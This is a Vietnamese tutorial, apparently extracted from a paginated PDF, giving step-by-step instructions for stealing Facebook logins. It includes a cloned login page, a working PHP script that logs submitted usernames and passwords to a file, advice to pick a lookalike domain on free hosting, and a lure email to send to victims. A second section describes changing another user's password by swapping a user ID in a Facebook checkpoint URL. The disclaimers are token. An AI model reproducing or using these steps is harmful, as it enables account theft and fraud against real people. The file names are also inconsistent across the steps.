Nghe hack facebook thì các bạn có thể nghỉ rằng chắc là lừa đảo hay chém gió cho vui, cũng bởi vì facebook là một tập đoàn mạng xã hội lớn nhất hiện tại, hệ thống server, bảo mật của nó
Trang 1Hướng dẫn hack tài khoản facebook sử
dụng phương pháp phishing
Trang 2Nghe hack facebook thì các bạn có thể nghỉ rằng chắc là lừa đảo hay chém gió cho vui, cũng bởi vì facebook là một tập đoàn mạng xã hội lớn nhất hiện tại, hệ thống server, bảo mật của nó là thứ thuộc dạng “siêu nhân” hết rồi, nhưng chúng ta cũng biết rằng, không có 1 căn nhà nào hoàn hảo cả, thế nào cũng phải có lổ cho những con kiến chui vào ^^
Nói cho vui thôi, thật chất là với khả năng gà mờ của mình thì chẳng thể làm gì thằng facebook cả, mục đích
là vọc phá cho vui, ở đây chúng ta sử dụng phương pháp phishing để đánh lừa nạn nhân Phương pháp này thì cũng thuộc dạng cổ điển nhưng vẫn rất hiệu quả, đã được nhiều
hacker dùng để lấy cắp thông tin tài khoản ngân hàng hay các thông tin bí mật khác Trong bài viết này, mình sẽ hướng dẫn sử dụng 1 cách cơ bản và dễ nhất cho
mọi người nhưng cũng đòi hỏi bắt buộc các bạn phải có 1 chút kiến thức về web, hosting Còn nếu không có thì phải tìm hiểu cách tạo 1 trang web miễn phí rồi hãy
đọc tiếp
Vào vấn đề chính, mục đích của chúng ta là đánh lừa nạn nhân rằng họ đang ở website của facebook (nhưng thật chất là web fake của mình tạo ra thôi) và đăng nhập tài khoản với password vào, lúc này tài khoản và password sẽ tự động gửi về host của mình
Trang 3Và 1 điều cần nói là hy vọng các bạn không sử dụng phương pháp này để quậy phá hay có hành vi trộm cắp thông tin cá nhân của người khác, chủ yếu
là để vọc phá thôi
Các bạn vào trang chủ của facebook : www.facebook.com
Click chuột phải vào vùng trống và chọn view source (firefox) hoặc view page source (chrome), nó sẽ ra 1 trang toàn là chữ với chữ, chúng ta copy hết nguyên đống code này về bỏ vào 1 file notepad, save lại với tên file là index.html để nó thành 1 web tĩnh Bạn có thể mở nó lên lại thử xem có phải hiện ra trang đăng nhập của facebook ko
Sau đó mở lại file index lên bằng notepad, nhấn Ctr + F để mở khung tìm kiếm, bạn gõ chữ “action” và nhấn find để tìm, nó sẽ tìm tới dòng có dạng như sau thì
dừng lại: action=”http:// http://www.facebook.com/login.php?login_atempt=1“,
lúc này bạn thay dòng http://
phishing.php, save lại
Trang 4Xong phần web fake, giờ chúng ta tạo mới 1 file notepad với nội dung như sau:
<?php
header (‘Location: http://www.facebook.com/’ ;);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Trang 5Chúng ta save file này lại với tên phish.php cho dễ nhớ Tổng cộng ta có 2 file là index.html và phish.php
Bây giờ tới phần hosting, các bạn có thể tạo host miễn phí tại bytehost.com , và tên miền miễn phí tại dyn.com/dns Các bạn nên đặt 1 cái tên miền nào liên quan tới
facebook để dễ đánh lừa người khác dạng như facebook.dyndns.com hay
facebooks.dyndns.com , facebook.bytehost7.com
Sau khi tạo và kết nối xong host với domain, chúng ta vào phần contolpanel của hosting, rồi kiếm mục file manager, trong file manager ta sẽ thấy có thư mục
htdocs doc or publish_html (host khác), chúng ta vào trong thư mục đó xóa file index.htm trong đó nếu có, sau đó chọn upload và up 2 file phishing.php và
index.html từ máy tính lên thư mục này
Chúng ta vào vào website bằng tên miền vừa đăng ký ở trên thử xem kết quả, nếu
ra giao diện của trang đăng nhập trên face là ok Còn nếu chưa được thì kiểm tra lại xem hosting và tên miền
Trang 6Thật chất chỗ này không khó, nhưng đòi hỏi phải có chút kiến thức về hosting và tên miền thì mới làm được, các bạn có thể đăng ký hosting và tên miền miễn phí của nhà cung cấp nào cũng được, Mục đích chính của chúng ta là up 2 file
phishing.php và pass.txt lên host để tạo thành một web fake đơn giản và chạy trên internet Bạn nào dân IT thì có thể tự làm trên localhost rồi tự NAT qua ngoài chạy cũng được
Tới đây coi như là xong 90% rồi, chỉ còn việc gửi đường link website này đi cho nạn nhân với 1 nội dung như báo cáo sự cố hay cần update thông tin trên facebook thông qua mail kèm theo đường link website fake của mình, tùy theo khả năng mời gọi của mỗi người mà nạn nhân dễ sập bẫy hơn Đại loại như vầy:
Khi nạn nhân nhấn vào link nó sẽ vào web fake của mình nhưng giao diện là của trang đăng nhập facebook, nếu may mắn thì sẽ không bị nghi ngờ tên miền, nạn nhân sẽ điền thông tin để đăng nhập, và khi login, website sẽ tự động chuyển về trang chủ facebook và báo lỗi đăng nhập sai, coi như mất dấu vết
Sau khi nạn nhân điền thông tin đăng nhập và login thì nó sẽ tự động gửi về
hosting 1 file tên là pass.txt
Các bạn vào file manager, trong thư mục chứa file phish.php, các bạn sẽ thấy file này, mở ra sẽ thấy được tên tài khoản và password tài khoản đó
Trang 7Thế là xong, hy vọng các bạn không dùng nó để làm điều xấu, có thể dùng nó để test trên bạn bè cho vui nhằm biết thêm một vài trick hack cho vui
Hack Facebook Password: Lỗi bảo mật của Facebook
0ác tin tặc đã tìm thấy một cách đơn giản để thay đổi mật khẩu Facebook của bạn,
nó dễ dàng như cách thay đổi mật khẩu của chính họ Thật khó tin phải không ? Gần đây Facebook vừa mới vá một lỗi bảo mật nghiêm trọng, đó là bất cứ ai cũng
có thể thay đổi mật khẩu của người dùng trên mạng xã hội Facebook
Facebook có một chức năng để người dùng có thể thay đổi mật khẩu của mình khi nghi vấn tài khoản có thể bị xâm nhập Bạn có thể truy cập tại địa
chỉ ”https://www.facebook.com/hacked”, sau đó trang này sẽ chuyển hướng
đến ”https://www.facebook.com/checkpoint/checkpointme?f = [userid] & r =
web_hacked”
Trang 8Nếu bạn thay giá trị f trên URL bằng USERID của người bạn muốn đổi mật khẩu, sau khi submit bạn đã thành công Rất đơn giản